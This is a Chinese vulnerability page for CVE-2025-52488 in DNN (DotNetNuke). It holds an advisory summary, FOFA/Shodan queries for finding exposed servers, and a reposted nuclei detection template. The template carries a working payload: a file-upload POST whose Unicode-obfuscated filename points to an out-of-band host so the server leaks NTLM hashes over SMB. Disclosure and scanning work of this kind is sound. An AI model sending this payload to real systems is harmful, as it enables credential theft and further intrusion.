DNN (DotNetNuke) Unicode Path Normalization NTLM Hash Disclosure

漏洞信息

漏洞名称: DNN (DotNetNuke) Unicode Path Normalization NTLM Hash Disclosure

漏洞编号:

  • CVE: CVE-2025-52488

漏洞类型: 信息泄露

漏洞等级: 高危

漏洞描述: DNN(原名DotNetNuke)是一个开源的基于微软生态系统的Web内容管理平台(CMS)。在6.0.0至10.0.1之前的版本中,DNN.PLATFORM允许通过一系列特制的恶意交互,可能将NTLM哈希暴露给第三方SMB服务器。此问题已在10.0.1版本中得到修复。

受影响产品:DNN是一个广泛使用的开源Web内容管理平台,主要用于构建和管理企业级网站。它支持模块化扩展,适用于各种规模的网站部署。由于其流行性,该漏洞的影响范围较广。

漏洞解释:此漏洞属于信息泄露类型,具体是由于Unicode路径规范化处理不当,导致攻击者可以构造恶意请求,诱使系统向攻击者控制的SMB服务器泄露NTLM哈希。这种漏洞的根源在于系统对用户提供的数据处理不当,未能正确验证和清理输入。

影响分析:此漏洞允许攻击者在无需认证的情况下远程获取用户的NTLM哈希,进而可能用于进一步的攻击,如Pass-the-Hash攻击。由于NTLM哈希的泄露,攻击者可能获得系统访问权限,导致数据泄露或其他安全风险。该漏洞的利用可以自动化,且不需要用户交互,因此风险较高。

产品厂商: dnnsoftware

产品名称: dotnetnuke

影响版本: 6.0.0 <= version < 10.0.1

搜索语法: app=”dotnetnuke” || Set-Cookie: dnn_IsMobile || icon_hash=”-1465479343”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/2990fd190a278aa826a12dd66e9ca5101aad77a2/http%2Fcves%2F2025%2FCVE-2025-52488.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

id: CVE-2025-52488

info:
  name: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
  author: DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
    epss-score: 0.00031
    epss-percentile: 0.07222
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        test
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
DNN (DotNetNuke) Unicode Path Normalization NTLM Hash Disclosure
http://example.com/2025/07/12/github_2990657392/
作者
lianccc
发布于
2025年7月12日
许可协议